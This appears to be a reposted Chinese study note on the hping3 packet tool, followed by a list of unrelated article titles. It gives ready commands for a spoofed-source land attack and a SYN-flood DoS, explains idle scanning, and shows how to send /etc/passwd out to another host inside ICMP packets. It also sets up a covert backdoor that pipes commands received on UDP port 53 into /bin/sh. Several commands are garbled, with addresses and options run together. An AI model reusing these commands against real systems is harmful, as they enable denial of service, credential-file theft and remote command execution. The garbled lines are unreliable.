Hping3学习稿
来源:互联网 发布:阿里云邮服务器地址 编辑:程序博客网 时间:2024/03/29 20:54
Hping3用于生成和解析TCP/IP协议数据包。Nmap团队也开发一款类似的工具Nping,集成在了Nmap中。
1、防火墙测试
hping3 -S -c 1000000 -a 10.10.10.10 -p 2110.10.10.10
以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)
http://0daysecurity.com/articles/hping3_examples.html
2、端口扫描
虽然Hping3可以进行端口扫描,但是我们并不推荐,所以不给出例子,学习可以参考Nmap学习笔记
3、Idle扫描
Idle扫描(Idle Scanning)是一种匿名扫描远程主机的方式,该方式也是有Hping3的作者Salvatore Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。
该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包(此处假设为SYN包),此时如果远程主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判断远程主机是否回复了数据包,从而间接地推测其端口状态。
4、DDoS攻击
hping3 -I eth0 -a 192.168.10.99 -S192.168.10.33 -p 80 -i u1000
对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。其他攻击如smurf、teardrop、land attack等也很容易构建出来。
5、发送文件
在接收端开启服务:
hping3 192.168.1.159--listensignature --safe --icmp
监听ICMP包中的签名,根据签名解析出文件内容。在发送端使用签名打包的ICMP包发送文件:
hping3192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d 100),发送签名为signature(-signsignature)。
6、木马功能
在本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。
在木马启动端:
hping3192.168.10.66--listen signature --safe --udp -p 53 |/bin/sh
在远程控制端:
echols >test.cmd
hping3192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
- Hping3学习稿
- 4.20学习-关于hping3的安装
- hping3-synflood攻击
- hping3 使用详解
- Nmap/Netcat/Hping3工具对比
- Nmap、Netcat、Hping3工具对比
- CentOS下编译安装hping3
- centos 6.2 64安装hping3
- hping3 发送自制icmp包
- hping3的编译和安装
- Hping3 ——ping扫描的好工具
- kail2.0下hping3的安装和使用
- kail2.0下hping3的安装和使用(二)
- 渗透学习整理稿
- Git 学习整理稿
- PPT 学习稿
- DIG学习稿
- Netcat学习稿
- OpenCV源码阅读(1)---matx.h---mat类与vec类
- java发送http get 和 post 请求
- DIG学习稿
- Strategy模式 策略模式
- 错误解决Error configuring application listener of class org.springframework.web.util.Log4jConfigListener
- Hping3学习稿
- 推荐系统评测指标:F-Measure
- Jquery的点击切换效果
- java编程基本知识点
- 小胖说事8------iOS 调用系统的短信和发送邮件功能,实现短信分享邮件分享
- NSWindow does not support utility styleMask 0x10
- android插件式开发(如QQ表情、微信表情等)
- 仿 Hola桌面 Launcher 定制 滑动文件夹 之 拖动分析
- RAC 数据库安装完成后,使用sql连接 提示连接到一个空实例